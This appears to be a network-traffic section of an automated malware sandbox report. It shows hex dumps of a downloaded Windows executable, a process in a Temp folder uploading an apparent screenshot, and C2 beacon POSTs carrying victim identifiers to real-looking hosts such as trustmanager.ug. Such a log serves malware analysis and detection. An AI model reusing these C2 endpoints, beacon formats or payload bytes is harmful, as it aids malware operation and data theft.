Aug 23, 2021 02:08:37.925163984 CEST	8630	IN	HTTP/1.1 200 OK Date: Mon, 23 Aug 2021 00:08:37 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 Last-Modified: Sun, 22 Aug 2021 15:27:14 GMT ETag: "3267b8-5ca27890360c8" Accept-Ranges: bytes Content-Length: 3303352 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 20 e2 00 b9 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 e0 02 00 00 fe 02 00 00 00 00 00 18 1b 50 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 7e 00 00 04 00 00 53 fb 32 00 03 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3a 40 06 00 50 00 00 00 00 00 7d 00 e3 71 01 00 00 00 00 00 00 00 00 00 b0 5a 32 00 08 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 00 e0 02 00 00 20 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 20 20 20 20 20 20 20 20 2a 10 00 00 00 00 03 00 00 08 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 f8 e9 02 00 00 20 03 00 00 98 00 00 00 86 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 0c 00 00 00 00 20 06 00 00 02 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 69 64 61 74 61 00 00 00 20 00 00 00 40 06 00 00 02 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 38 30 30 2d 38 35 30 20 00 72 01 00 00 60 06 00 00 72 01 00 00 22 02 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 74 68 65 6d 69 64 61 00 e0 47 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 e0 2e 62 6f 6f 74 00 00 00 00 3c 2d 00 00 c0 4f 00 00 3c 2d 00 00 94 03 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 72 73 72 63 00 00 00 e3 71 01 00 00 00 7d 00 00 72 01 00 00 d0 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL P @ ~S2@:@P}qZ2 z ` *~@ @@ @@.idata @ @800-850 r`r"``.themidaG`.boot<-O<-``.rsrcq}r0@@
Aug 23, 2021 02:08:37.925209045 CEST	8631	IN	Data Raw: 00 00 00 8a 3f 85 08 6a 46 fc bf b3 5b af c6 e6 de 03 08 dc 3f 78 0e b9 26 2b c9 bc 4d 00 bb a6 33 3a f0 93 46 06 03 a1 37 ba 01 a5 00 04 8b bb 56 d9 08 9c 5d 01 0d 26 59 ba 22 0a 05 cd 0a 9f 41 0d fe 7f 2d 77 ab ca 84 ad 29 a1 c2 00 0e ae 42 cf Data Ascii: ?jF[?x&+M3:F7V]&Y"A-w)B7+P^]aPISh.^EUR?~?`"vIDTzGRX8/:5dU6XXUn?Nn)<
Aug 23, 2021 02:08:37.925246954 CEST	8632	IN	Data Raw: 32 93 46 de f6 e0 60 52 72 a0 57 64 f9 8a 93 61 da 9f 4c 56 b6 6a 5c 78 35 70 41 3b af 6d 7d b9 12 50 e2 49 9a 92 5f c6 2d a8 4c da 09 b2 b9 c8 93 83 67 64 6e a6 57 7b 62 16 2a d4 0e 5e 07 12 9f 6d 5e b2 e8 b7 ca c9 ff d8 a1 d9 15 63 0a ee fa a1 Data Ascii: 2F`RrWdaLVj\x5pA;m}PI_-LgdnW{b^m^cOe3W!)gq[\UH^5B6/M!h`8SA!rKjP,;z\|bf/_-}UL>WheWF^ib)_ur5ZXOn
Aug 23, 2021 02:08:37.925282001 CEST	8634	IN	Data Raw: 5c ca be a5 2d 0c 0e 9d e1 b9 76 49 3f 7b c3 a5 ef ef fc bd 5d 2a c5 53 21 03 2f da 70 b9 34 7b 99 d5 f6 4d d5 dc 9c 13 d5 c4 f8 c9 f6 69 7e 20 50 2c fb 83 28 4d b3 a8 25 c5 f6 9f 56 0f a9 98 38 d3 e0 8c 30 9e 17 7e 09 dd 3c 98 3f c6 3c bd 21 26 Data Ascii: \-vI?{]*S!/p4{Mi~ P,(M%V80~<?<!&~+F?:eH~?`P)c2~j@%X]BR^((+,LP5p%guOU$X_:)5ZIT0\| Rm"r<%Po&
Aug 23, 2021 02:08:37.925321102 CEST	8635	IN	Data Raw: f0 88 f3 09 ae 76 5c f0 6b 22 cb db 6a 0a dd 80 2c ce 5b a8 0c ad 1e 22 3e f6 e4 cb 45 38 33 d2 0d 31 ab a5 ed d6 97 ef 57 49 ce 1e f8 e6 29 6e 18 0f e3 cd 3a ab 18 dc ea 9c 87 a7 aa c2 09 d4 12 f0 0e f2 34 98 37 d8 e6 b7 38 eb 66 b2 e0 98 e3 3f Data Ascii: v\k"j,[">E831WI)n:478f?\14x! BxUZM/aj63)N<^YcM5LXz\.XJ*Q7&-w5)O2e%@MeOc1#OsK6W2
Aug 23, 2021 02:08:37.925359011 CEST	8637	IN	Data Raw: 26 78 bc b7 de 08 85 bd 9b 50 c5 28 69 80 e7 3d 50 d4 ae d3 65 4f c8 9f 59 32 8d 32 cf e8 a2 75 c9 b9 a4 af 0e 92 08 19 57 3d 7a b7 89 46 bb 3e d9 42 f7 12 c8 f9 59 e5 ee 97 50 5e 4e 84 5a 51 eb b2 7b d3 2c ac 36 21 33 26 8a fe 5e b9 08 aa d1 f1 Data Ascii: &xP(i=PeOY22uW=zF>BYP^NZQ{,6!3&^VpU\|%/6WQV\VU:T"N<&.;TAwS>\~LR`sZoK<CTs{mRT~f-~k~PuW00K
Aug 23, 2021 02:08:37.925405979 CEST	8638	IN	Data Raw: 55 eb 7f e9 6c 60 2a b1 3a 54 6b bb dd 52 fb 29 6e 63 8b 0b 8f b6 d6 42 ed 07 20 a4 ca c4 0f 5e df 12 54 b5 54 76 8b b2 ef d2 b7 5b a8 93 49 23 4e e0 30 4d 5e 34 60 40 4e 35 76 42 a8 97 2b 6c 70 23 bf b5 d6 89 5b bb 0d 9f 2e a9 3a ea 22 f0 e9 97 Data Ascii: Ul`*:TkR)ncB ^TTv[I#N0M^4`@N5vB+lp#[.:""+f{7P=Z'N{>uBJp6$6x6MW!HHC\|wNM$5cvHxc~L`S0>Etkq\|PQ_)3,7EY7
Aug 23, 2021 02:08:37.925447941 CEST	8639	IN	Data Raw: 1c f5 d6 22 92 78 5a cd 8e a3 fc 7f d1 84 e9 ca e6 b1 e6 68 55 1e a5 6e 9c 79 68 ba 08 75 fd 82 d6 91 54 f3 e4 0c 63 2a 76 96 f8 73 79 df 9f 69 84 b5 05 df d9 47 28 5e 55 0b 43 ed a9 c4 56 17 e2 7f aa 94 2b 72 93 af 34 5b d8 5c 92 de 23 b7 53 68 Data Ascii: "xZhUnyhuTcvsyiG(^UCV+r4[\#ShXwWJc]V_Ga.{m}"<ud/2KU! /t//8"o9Su'B_1`B<(Lw3Bsa;_BE.^O7@OzFgKOak?#'
Aug 23, 2021 02:08:37.925806046 CEST	8641	IN	Data Raw: 07 f4 8b fa 3e 10 8f b8 4a 61 79 bd 90 74 ab 82 42 72 a1 e6 7f ae eb e5 33 83 57 52 8e 5f 5b 7a d4 d8 96 76 3a e6 1c d9 e6 56 ef c6 f9 a4 56 06 03 25 66 df ed 4c c7 96 e6 e8 77 ab b8 67 74 cb 6a 76 1b 1f dc c2 90 d5 ce 30 d9 c2 33 a6 5f 68 11 ae Data Ascii: >JaytBr3WR_[zv:VV%fLwgtjv03_hL$(5d}\|f?_vm*RAXf(e=0k5<e3gb@a[DkGJE4 rE;DBb\uPT=z$.
Aug 23, 2021 02:08:37.925847054 CEST	8642	IN	Data Raw: 57 3f 19 e7 96 d0 98 9d 39 4a a9 41 5a f0 5f cc 81 d8 c9 cc da a3 fa f6 af d2 d4 33 3f da 6b d0 ed 65 93 f1 5b ab 6f 82 1f 40 69 4a d8 4f 22 82 1c 4d ea a0 f4 f3 11 78 c1 1f b4 78 86 0b 1f ad 1b 79 0e a2 77 97 8c 42 5e d3 e6 bb 65 aa f6 93 94 a8 Data Ascii: W?9JAZ_3?ke[o@iJO"MxxywB^ey8v^oDoH-Kxw3>%S)K#W'H0rxS]mF"v{^}?'A\HhjVD@\Tq;yfW6(%+
Aug 23, 2021 02:08:37.956537008 CEST	8644	IN	Data Raw: 16 7f 05 b6 80 98 07 b2 05 b3 f1 c5 d6 c4 c2 9d d6 92 c0 08 e1 07 82 26 b9 d5 29 a9 0e e7 18 ea e1 2d 26 18 43 9e 2f 70 a3 55 37 2e bc c1 68 42 3a 52 4e 9c 76 60 fc 5b 76 ac 97 db c9 ff ff ca 00 47 5f 13 71 79 5c ac 7e 61 3f c3 6b a0 14 23 8e ad Data Ascii: &)-&C/pU7.hB:RNv`[vG_qy\~a?k#'d+.$"1pN2?")H3S-~&gUmg^+GwI>F=Biy$gJ*diE~3Nl9i'K;b+'

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
130	192.168.2.3	49855	185.215.113.206	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:12.227580070 CEST	17806	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: 185.215.113.206 Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:12.227680922 CEST	17806	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:12.227895975 CEST	17816	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:12.228058100 CEST	17819	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:12.288464069 CEST	17823	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:12.288520098 CEST	17826	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
Aug 23, 2021 02:09:12.288769960 CEST	17829	OUT	Data Raw: c6 62 8a 7d 18 a2 c1 71 84 53 76 d4 98 a4 22 90 5c 8c 8a 42 2a 4c 53 71 4a c5 26 47 8a 4c 54 b8 a6 e2 a6 c5 5c 8f 14 62 a4 c5 37 14 ac 3b 8c c5 18 a7 d2 11 49 a1 dc 66 28 c5 2e 28 c5 2b 0e e3 48 a4 c5 3b 14 62 8b 00 cc 52 11 4f a4 c5 49 57 19 8a Data Ascii: b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK@"-BTF[#9Ss9B.Odg+jz}???XrWSG#V
Aug 23, 2021 02:09:12.289195061 CEST	17832	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
Aug 23, 2021 02:09:12.289307117 CEST	17834	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:09:12.289369106 CEST	17840	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:09:12.289649010 CEST	17841	OUT	Data Raw: d8 aa b9 a3 34 bd 9c 46 58 37 72 f7 6c fd 4d 1f 6b 97 1f 7b 1f 41 55 b3 4b 4f 92 3d 83 62 c1 b9 95 87 32 31 fc 69 a6 46 6e ac 4f d6 a3 a2 8e 48 f6 0b b2 55 72 0e 6b a5 bd bc 78 be 1a b7 cd cb cf b7 f0 ae 5f a0 ad 5d 62 5c 7c 3e 86 3f 5b 93 5c 38 Data Ascii: 4FX7rlMk{AUKO=b21iFnOHUrkx_]b\\|>?[\8'w`%iK)bCM:zj<vS@P7,IV~\2y>oH4k+}Xo`9*>i":L\W:DC IF#NmmdLgl[Z=)C
Aug 23, 2021 02:09:12.539161921 CEST	17905	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:09:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
131	192.168.2.3	49857	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:12.371037960 CEST	17899	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:12.397072077 CEST	17900	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:12.397092104 CEST	17900	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
132	192.168.2.3	49858	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:12.542535067 CEST	17905	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:12.570648909 CEST	17907	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 